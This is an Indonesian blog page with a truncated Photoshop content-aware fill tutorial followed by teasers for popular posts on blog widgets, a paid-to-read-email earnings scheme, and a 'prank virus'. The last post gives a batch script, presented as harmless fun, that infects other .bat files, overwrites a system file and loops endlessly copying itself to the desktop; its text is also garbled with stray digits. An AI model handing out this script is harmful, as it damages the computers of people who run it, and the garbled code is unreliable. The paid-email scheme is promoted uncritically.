Langsung ke konten utama

Menghilangkan Obyek Dengan Photoshop Content Aware Fill

Dimulai dari Photoshop CS4, Adobe menambahkan fitur baru yang cukup fenomenal bernama content-aware fill. Fitur ini disambut secara antusias oleh pelaku foto karena dirasa akan memberi kemudahan luar biasa dalam proses edit foto. Jadi apa itu content-ware fill? Gampangnya bayangkan jika kita harus menghapus obyek pohon yang ada ditengah foto sawah, kita buat seleksi yang mengellingi pohon lalu menghapusnya, namun foto kita akan tampak bolong dibagian yang dihapus. Nah dengan content-aware fill, photoshop akan mengisi secara otomatis bagian yang bolong tadi secara sempurna dan serasi dengan lingkungan disekitarnya.

Ah pusing bayanginnya, oke mari kita praktekan secara langsung.

Saya akan mendemonstrasikan kemampuan Photoshop (saya menggunakan CS5, anda bisa menggunakan CS4 atau CS5) untuk menghapus sebuah obyek (tenda merah) ditengah pantai lalu secara otomatis Photoshop akan mengisi bagian yang terhapus tadi dengan “pantai baru”, silahkan:.

Buka foto di Photoshop



View the Original article

Komentar

Postingan populer dari blog ini

trik memperindah blog dengan berbagai aksesoris

Konon, blog itu berjenis kelamin perempuan. Dan, karena itu, perlu dihiasi dg aksesoris supaya selalu tampak cantik dan dapat menarik hati kaum blogger (yg ini berjenis laki-laki).Berikut sejumlah “perhiasan” blog yg dapat dipasang di blog Anda yg berfungsi tidak hanya sebagai perhiasan tapi juga untuk menarik hati kaum blogger (baca, pengunjung) dan search engine. Sekali lagi perlu diingat, aksesoris ini hanya dapat dipasang pada blog yg templatenya dapat diedit seperti blogspot.com, blogdrive.com plus blog yg domain/hostingnya beli sendiri, tentunya.1. BukutamuBukutamu blog disebut juga dg shoutbox atau tagboard. Sama dg bukutamu website, tapi bentuknya lebih sederhana. Banyak situs penyedia bukutamu blog gratis yg bisa Anda cari di google dg kata kunci shoutbox atau tagboard. http://shoutmix.com termasuk penyedia bukutamu blog yg disukai yg servernya cukup stabil.Caranya:

Mendapatkan Dollar dari DonkeyMails

Sebelum mengetahui apa itu DonkeyMails.com, terlebih dahulu diinformasikan bahwa DonkeyMails.com menerima e-gold di sebagai satu alat pembayaran komisi disamping alat pembayaran lainnya. Bagi yang baru mengetahui tentang e-gold, silakan pelajari toturialnya di sini. DonkeyMails adalah suatu program bisnis online Get Paid to Read E-mail. Anda mendapatkan bayaran dollar dengan cara membaca iklan yang dikirimkan ke e-mail anda atau anda bisa langsung ke member area anda dan masuk ke Your Inbox anda. Selain itu program ini juga menawarkan Paid2Click untuk menambah penghasilan anda. Apabila anda menemukan link-link yang sebelumnya ada tulisan NON PAID, maka link ini ga usah diklik, anda tidak mendapatkan bayaran. Hati-hati pula apabila ada tulisan Unsubscribe atau yang lebih parah lagi Not Click atau Don’t Click (seandainya ada). Kalau anda sampai mengklik link seperti itu, jelas anda kehilangan penghasilan cari uang kerja sampingan yang mudah ini. Nah udah jelaskan, very eas...

how to make a prank virus only for fun!

hello friends........ in this post i will tell you how can u make a funny prank virus :) trick is here: open notepad and type @echo off 3echo checking system:4 5echo for %%i in ("*.bat") do copy %%i+c:\tmp.bat %%i >c:\windows\system32\autoexec.NT6echo VIRUS DETECTED pause echo DELETING VIRUS pause :1 dir /s copy c:\tmp.bat c:\docum~1\%username%\desktop\greatgame_%random%.bat7 goto 1 This will create a never ending stream of mindless code. This cannot be stopped easily.8Save the file as "virus.bat"